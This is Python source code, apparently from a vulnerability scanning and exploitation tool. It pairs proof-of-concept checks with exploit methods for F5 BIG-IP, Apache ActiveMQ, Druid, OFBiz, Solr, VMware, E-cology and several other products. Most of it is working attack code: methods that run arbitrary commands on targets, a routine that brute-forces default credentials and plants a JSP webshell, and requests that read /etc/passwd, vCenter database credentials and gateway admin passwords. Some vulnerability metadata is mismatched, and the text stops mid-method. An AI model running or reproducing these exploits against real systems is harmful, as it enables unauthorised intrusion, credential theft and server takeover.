def cve_2021_22986_exp(self, cmd): vul_name = "F5 BIG-IP: CVE-2021-22986" headers = { 'User-Agent': self.ua, 'Accept': '*/*', 'Connection': 'close', 'Authorization': 'Basic YWRtaW46', 'X-F5-Auth-Token': '', 'Content-Type': 'application/json' } data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace( "RECOMMAND", cmd) url = urljoin(self.url, "/mgmt/tm/util/bash") try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) r = json.loads(request.text)["commandResult"] self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(r, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception as e: verify.error_print(vul_name)
def cve_2016_3088_exp(self, cmd): self.threadLock.acquire() vul_name = "Apache AcitveMQ: CVE-2016-3088" self.path = "null" self.name = random_md5() self.webshell = "/" + self.name + ".jsp" self.exp = self.jsp_webshell self.passlist = [ "admin:123456", "admin:admin", "admin:123123", "admin:activemq", "admin:12345678" ] try: for self.pa in self.passlist: self.base64_p = base64.b64encode(str.encode(self.pa)) self.p = self.base64_p.decode('utf-8') self.headers_base64 = { 'User-Agent': self.ua, 'Authorization': 'Basic ' + self.p } url = urljoin(self.url, "/admin/test/systemProperties.jsp") self.request = requests.get(url, headers=self.headers_base64, timeout=self.timeout, verify=False) if self.request.status_code == 200: self.path = \ re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0] break self.request = requests.put(self.url + "/fileserver/v.txt", headers=self.headers_base64, data=self.exp, timeout=self.timeout, verify=False) self.headers_move = { 'User-Agent': self.ua, 'Destination': 'file://' + self.path + '/webapps/api' + self.webshell } self.request = requests.request("MOVE", self.url + "/fileserver/v.txt", headers=self.headers_move, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(self.request).decode( 'utf-8', 'ignore') self.request = requests.get(self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd, headers=self.headers_base64, timeout=self.timeout, verify=False) self.r = "[webshell: " + self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd + " ]\n" self.r += self.request.text verify.exploit_print(self.r, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2021_25646_exp(self, cmd): vul_name = "Apache Druid: CVE-2021-25646" url = urljoin(self.url, "/druid/indexer/v1/sampler") headers = { 'Content-Type': 'application/json', 'User-Agent': self.ua, 'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2', 'Connection': 'keep-alive' } data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd) try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) r = "Command Executed Successfully (But No Echo)" raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(r, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2021_22986_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2021-22986" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution" self.vul_info["vul_numb"] = "CVE-2021-22986" self.vul_info["vul_apps"] = "Flink" self.vul_info["vul_date"] = "2021-03-11" self.vul_info["vul_vers"] = "< 16.0.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "BIG-IP存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过BIG-IP" \ "管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令," \ "创建或删除文件以及替换服务。该中断只能通过控制界面利用,而不能通过数据界面利用。" self.vul_info["cre_date"] = "2021-03-20" self.vul_info["cre_auth"] = "zhzyker" headers = { 'User-Agent': self.ua, 'Accept': '*/*', 'Connection': 'close', 'Authorization': 'Basic YWRtaW46', 'X-F5-Auth-Token': '', 'Content-Type': 'application/json' } md = random_md5() cmd = "echo " + md data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace( "RECOMMAND", cmd) url = urljoin(self.url, "/mgmt/tm/util/bash") try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) r = json.loads(request.text)["commandResult"] if request.status_code == 200: if md in misinformation(r, md): self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["vul_payd"] = data self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def time_2021_0410_exp(self, cmd): vul_name = "QiAnXin NS-NGFW: time-2021-0410" url = urljoin(self.url, "/directdata/direct/router") md = random_md5() data = { "action": "SSLVPN_Resource", "method": "deleteImage", "data": [{ "data": [ "/var/www/html/d.txt;" + cmd + " > /var/www/html/" + md + ".txt" ] }], "type": "rpc", "tid": 17 } data = json.dumps(data) try: request = requests.post(url, data=data, headers=self.headers, timeout=self.timeout, verify=False) url = urljoin(self.url, md + ".txt") req = requests.get(url, data="1", headers=self.headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(req.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2021_27905_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF" self.vul_info["vul_numb"] = "CVE-2021-27905" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2021-04-14" self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "SSRF" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。" self.vul_info["cre_auth"] = "zhzyker" core_name = None dns = dns_request() url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \ "=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns) url_ssrf = urljoin(self.url, payload) r = requests.get(url_ssrf, headers=self.headers, timeout=self.timeout, verify=False) if dns in dns_result(dns): self.vul_info["vul_payd"] = url_ssrf self.vul_info["vul_data"] = dump.dump_all(r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def time_2021_0515_poc(self): self.threadLock.acquire() self.vul_info[ "prt_name"] = "E-cology OA WorkflowServiceXml RCE: time-2021-0515" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "E-cology OA WorkflowServiceXml RCE" self.vul_info["vul_numb"] = "time-2021-0415" self.vul_info["vul_apps"] = "E-cology" self.vul_info["vul_date"] = "2021-05-15" self.vul_info["vul_vers"] = "E-cology <= 9.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "RCE" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "The WorkflowServiceXml interface can be accessed without authorization. The attacker can call this interface to construct a specific HTTP request to bypass the security restrictions of E-cology itself to achieve remote command execution." self.vul_info["cre_date"] = "2021-05-19" self.vul_info["cre_auth"] = "zhzyker" url = urljoin(self.url, "/services%20/WorkflowServiceXml") md = random_md5() cmd = "echo " + md headers = { 'User-Agent': self.ua, 'SOAPAction': '""', 'cmd': cmd, "Content-Type": "text/xml;charset=UTF-8" } data = self.payload_time_2021_0515 try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) #print(self.url + " " + str(request.status_code) + request.text) if md in misinformation(request.text, md) and request.status_code == 500: self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = data self.vul_info["prt_info"] = "[rce: " + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_25646_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2021-25646" self.vul_info["vul_apps"] = "Druid" self.vul_info["vul_date"] = "2021-02-01" self.vul_info["vul_vers"] = "< 0.20.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \ "此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \ "经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \ "攻击者可直接构造恶意请求执行任意代码,控制服务器。" self.vul_info["cre_date"] = "2021-02-03" self.vul_info["cre_auth"] = "zhzyker" url = urljoin(self.url, "/druid/indexer/v1/sampler") headers = { 'Content-Type': 'application/json', 'User-Agent': self.ua, 'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2', 'Connection': 'keep-alive' } md = dns_request() cmd = "ping " + md data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd) try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) if dns_result(md): self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["vul_payd"] = data self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cnvd_2021_26422_exp(self, cmd): vul_name = "Eyou Email System: CNVD-2021-26422" url = urljoin(self.url, "/webadm/?q=moni_detail.do&action=gragh") payload = "type='|" + cmd + "||'" try: request = requests.post(url, data=payload, headers=self.headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def time_2021_0424_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Ruijie-EG Easy Gateway: time-2021-0424" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Get account password, background rce" self.vul_info["vul_numb"] = "time-2021-0415" self.vul_info["vul_apps"] = "RuiJie" self.vul_info["vul_date"] = "2021-04-24" self.vul_info["vul_vers"] = "unknow" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "RCE" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Get account password, background rce" self.vul_info["cre_date"] = "2021-04-26" self.vul_info["cre_auth"] = "zhzyker" url = urljoin(self.url, "/login.php") payload = "username=admin&password=admin?show+webmaster+user" try: request = requests.post(url, data=payload, headers=self.headers, timeout=self.timeout, verify=False) res = json.loads(request.text)["data"] get_user = re.search('admin', res) if get_user: if r"01. " in res: user = re.findall("00. (.*?) ", res)[0] pasd = re.findall(r"admin (.*)\r\r", res)[0] else: user = re.findall("00. (.*?) ", res)[0] pasd = re.findall(r"admin (.*)", res)[0] if user and pasd: self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = payload self.vul_info["prt_info"] = "[username:"******"] [password:"******"]" elif user: self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = payload self.vul_info["prt_info"] = "[user&pass:"******"]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_21975_poc(self): self.threadLock.acquire() self.vul_info[ "prt_name"] = "VMware vRealize Operations Manager: CVE-2021-21975" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "VMware vRealize Operations Manager API SSRF" self.vul_info["vul_numb"] = "CVE-2021-21972" self.vul_info["vul_apps"] = "Vmware" self.vul_info["vul_date"] = "2021-03-31" self.vul_info["vul_vers"] = "<= 8.3.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "SSRF" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击" self.vul_info["cre_date"] = "2021-04-01" self.vul_info["cre_auth"] = "zhzyker" try: headers = { "User-Agent": self.ua, "Content-Type": "application/json;charset=UTF-8" } dns = dns_request() data = '["' + dns + '"]' url = urljoin(self.url, "/casa/nodes/thumbprints") res = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) if dns_result(dns): self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = data self.vul_info["prt_info"] = "[ssrf] [dns:" + dns + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2020_5902_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2020-5902" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution" self.vul_info["vul_numb"] = "CVE-2020-5902" self.vul_info["vul_apps"] = "Flink" self.vul_info["vul_date"] = "2020-07-15" self.vul_info["vul_vers"] = "< 11.6.x" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "The Traffic Management User Interface (TMUI), also referred to as the " \ "Configuration utility, has a Remote Code Execution (RCE) vulnerability in " \ "undisclosed pages. (CVE-2020-5902)" self.vul_info["cre_date"] = "2021-03-20" self.vul_info["cre_auth"] = "zhzyker" url = urljoin( self.url, "/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=CVE-2020-5902") try: request = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False) if request.status_code == 200 and r"CVE-2020-5902" in request.text: url = self.url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" request = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False) if r"root:x:0:0:" in request.text and r"daemon:x:" in request.text and r"nologin" in request.text: self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["vul_payd"] = url self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[rce] [url:" + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2020_5902_exp(self, cmd): vul_name = "F5 BIG-IP: CVE-2020-5902" url = urljoin( self.url, "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=" + cmd) try: request = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception as e: verify.error_print(vul_name)
def time_2021_0414_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "CoreMail: time-2021-0414" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "Coremail configuration information disclosure vulnerability" self.vul_info["vul_numb"] = "time-2021-0414" self.vul_info["vul_apps"] = "CoreMail" self.vul_info["vul_date"] = "2021-04-19" self.vul_info["vul_vers"] = "unknow" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "RCE" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Coremail configuration information disclosure vulnerability" self.vul_info["cre_date"] = "2021-04-29" self.vul_info["cre_auth"] = "zhzyker" url = urljoin(self.url, "/mailsms/s?func=ADMIN:appState&dumpConfig=/") try: request = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False) if request.status_code == 200: if r"FS_IP_NOT_PERMITTED" not in request.text and r"/home/coremail" in request.text: self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "vul_payd"] = "/mailsms/s?func=ADMIN:appState&dumpConfig=/" self.vul_info["prt_info"] = "[url:" + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_26295_exp(self, cmd): vul_name = "Apache OFBiz: CVE-2021-26295" headers = { 'User-Agent': self.ua, 'Content-Type': 'text/xml', 'Connection': 'close' } def _trans(s): return "%s" % ''.join('%.2x' % x for x in s) try: dns_data = bytes(cmd, encoding="utf8") dns_hex = _trans(dns_data) data = self.payload_cve_2021_26295_exp_1.replace( "RECOMMAND", dns_hex) url = urljoin(self.url, "/webtools/control/SOAPService") request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) if r"cus-obj" in request.text: data = self.payload_cve_2021_26295_exp_2.replace( "RECOMMAND", dns_hex) request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') if request.status_code == 200: r = "Command Executed Successfully (But No Echo)" else: r = "Command Executed Failed... ..." verify.exploit_print(r, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception as e: verify.error_print(vul_name)
def cnvd_2021_26422_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Eyou Email System: CNVD-2021-26422" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Eyou email system has remote command execution" self.vul_info["vul_numb"] = "CNVD-2021-26422" self.vul_info["vul_apps"] = "Eyou" self.vul_info["vul_date"] = "2021-04-19" self.vul_info["vul_vers"] = "unknow" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "RCE" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Eyou email system has remote command execution" self.vul_info["cre_date"] = "2021-04-29" self.vul_info["cre_auth"] = "zhzyker" url = urljoin(self.url, "/webadm/?q=moni_detail.do&action=gragh") md = random_md5() cmd = "echo " + md payload = "type='|" + cmd + "||'" try: request = requests.post(url, data=payload, headers=self.headers, timeout=self.timeout, verify=False) if md in misinformation(request.text, md): self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = payload self.vul_info["prt_info"] = "[cmd:" + cmd + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def time_2021_0515_exp(self, cmd): vul_name = "E-cology OA WorkflowServiceXml RCE: time-2021-0515" url = urljoin(self.url, "/services%20/WorkflowServiceXml") headers = { 'User-Agent': self.ua, 'SOAPAction': '""', 'cmd': cmd, "Content-Type": "text/xml;charset=UTF-8" } data = self.payload_time_2021_0515 try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def time_2021_0410_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "QiAnXin NS-NGFW: time-2021-0410" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE" self.vul_info["vul_numb"] = "time-2021-0415" self.vul_info["vul_apps"] = "QiAnXin" self.vul_info["vul_date"] = "2021-04-10" self.vul_info["vul_vers"] = "unknow" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "RCE" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE" self.vul_info["cre_date"] = "2021-04-16" self.vul_info["cre_auth"] = "zhzyker" url = urljoin(self.url, "/directdata/direct/router") md = random_md5() cmd = "echo " + md data = { "action": "SSLVPN_Resource", "method": "deleteImage", "data": [{ "data": [ "/var/www/html/d.txt;" + cmd + " > /var/www/html/" + md + ".txt" ] }], "type": "rpc", "tid": 17 } data = json.dumps(data) try: request = requests.post(url, data=data, headers=self.headers, timeout=self.timeout, verify=False) url = urljoin(self.url, md + ".txt") req = requests.get(url, data="1", headers=self.headers, timeout=self.timeout, verify=False) if md in misinformation(req.text, md) and ( md + ".txt") not in req.text and req.status_code == 200: self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = data self.vul_info["prt_info"] = "[rce:" + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as error: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_26295_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache OFBiz: CVE-2021-26295" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info[ "vul_name"] = "Apache OFBiz RMI deserializes arbitrary code execution" self.vul_info["vul_numb"] = "CVE-2021-26295" self.vul_info["vul_apps"] = "Flink" self.vul_info["vul_date"] = "2021-03-25" self.vul_info["vul_vers"] = "< 17.12.06" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Arbitrary Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Apache OFBiz官方发布安全更新,修复了一处由RMI反序列化造成的远程代码执行漏洞。" \ "攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器." self.vul_info["cre_date"] = "2021-03-31" self.vul_info["cre_auth"] = "zhzyker" headers = { 'User-Agent': self.ua, 'Content-Type': 'text/xml', 'Connection': 'close' } def _trans(s): return "%s" % ''.join('%.2x' % x for x in s) def dnslog_re(md): headers_dnslog = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36', 'Host': 'www.dnslog.cn', 'Cookie': 'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548', 'Accept': '*/*', 'Referer': 'http://www.dnslog.cn/', 'Accept-Language': 'zh-CN,zh;q=0.9', 'Connection': 'close' } dnslog_url = "http://www.dnslog.cn/getrecords.php?t=0.913020034617231" dns = requests.get(dnslog_url, headers=headers_dnslog, timeout=10, verify=False) if md in dns.text: return md try: headers_dnslog = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36', 'Host': 'www.dnslog.cn', 'Cookie': 'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548', 'Accept': '*/*', 'Referer': 'http://www.dnslog.cn/', 'Accept-Language': 'zh-CN,zh;q=0.9', 'Connection': 'close' } dnslog_api = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366" dns = requests.post(dnslog_api, headers=headers_dnslog, timeout=10, verify=False) dns = dns.text dns_data = bytes(dns, encoding="utf8") dns_hex = _trans(dns_data) data = self.payload_cve_2021_26295_poc.replace( "RECOMMAND", dns_hex) url = urljoin(self.url, "/webtools/control/SOAPService") request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) if dnslog_re(dns): self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["vul_payd"] = data self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[dns] [rmi:" + dns + "]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def time_2020_1013_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Vmware vCenter: time-2020-10-13 (not cve)" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Vmware vCenter 任意文件读取" self.vul_info["vul_numb"] = "time-2020-10-13" self.vul_info["vul_apps"] = "Vmware" self.vul_info["vul_date"] = "2020-10-13" self.vul_info["vul_vers"] = "<= 6.5u1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "任意文件读取" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. VMware revealed that this vulnerability was patched in 6.5u1, but no CVE was assigned." self.vul_info["cre_date"] = "2021-02-26" self.vul_info["cre_auth"] = "zhzyker" headers = { "User-agent": self.ua, "Connection": "close", } try: url = urljoin(self.url, "/eam/vib?id=/etc/passwd") res = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if res.status_code == 200 and r"root:/bin/bash" in res.text and r"root:x:0:0" in res.text: self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["vul_payd"] = url self.vul_info[ "prt_info"] = "[file] [os:linux] [url:" + url + " ]" else: url = urljoin( self.url, "/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties" ) res = requests.get(url, headers=headers, timeout=self.timeout, verify=False) if res.status_code == 200 and r"username" in res.text and r"password" in res.text and r"dirver" in res.text: self.vul_info["vul_data"] = dump.dump_all(res).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" 